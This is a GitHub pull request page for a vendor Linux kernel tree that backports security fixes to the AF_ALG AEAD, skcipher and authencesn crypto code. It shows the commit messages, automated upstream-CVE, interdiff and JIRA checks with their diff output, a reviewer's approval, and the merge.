commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd4

The check for the minimum receive buffer size did not take the
tag size into account during decryption.  Fix this by adding the
required extra length.

	Reported-by: syzbot+aa11561819dc42ebbc7c@syzkaller.appspotmail.com
	Reported-by: Daniel Pouzzner <douzzer@mega.nu>
Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
(cherry picked from commit 3d14bd4)
	Signed-off-by: Jonathan Maple <jmaple@ciq.com>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3

AF_ALG AEAD AIO requests currently use the socket-wide IV buffer during
request processing.  For async requests, later socket activity can
update that shared state before the original request has fully
completed, which can lead to inconsistent IV handling.

Snapshot the IV into per-request storage when preparing the AEAD
request, so in-flight operations no longer depend on mutable socket
state.

Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
    Cc: stable@kernel.org
    Reported-by: Yuan Tan <yuantan098@gmail.com>
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Reported-by: Xin Liu <bird@lzu.edu.cn>
    Co-developed-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Signed-off-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Tested-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

@kerneltoast kerneltoast left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

:shipit:

@github-actions

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25192172211

@github-actions

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ❌ PR commit d08cb27e238 (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf has no CVE assigned

This is an automated message from the kernel commit checker workflow.

@github-actions

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit 6b87a405fbe (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -207,13 +208,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -28,5 +28,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -69,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -210,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -223,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -240,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -267,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -279,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -478,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -310,7 +359,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
  • ⚠️ PR commit c5c2993b730 (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -82,14 +82,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -79,7 +79,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 579007c5ff3 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -275,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit d08cb27e238 (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -164,10 +164,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -176,16 +173,11 @@
 	skcipher_request_set_sync_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -245,7 +237,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -255,11 +246,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -308,8 +296,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -327,10 +320,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -225,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -281,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 9f3908d225e (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -220,7 +220,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -208,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

Copy link
Copy Markdown

JIRA PR Check Results

1 commit(s) with issues found:

Commit 579007c5ff3a

Summary: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

⚠️ Warnings:

  • VULN-175569: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

Copy link
Copy Markdown

Validation checks completed successfully View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25192172211

@PlaidCat PlaidCat requested review from a team and kemotaha April 30, 2026 22:58
@PlaidCat PlaidCat merged commit 9f3908d into ciqlts9_6 Apr 30, 2026
7 of 8 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Development

Successfully merging this pull request may close these issues.

3 participants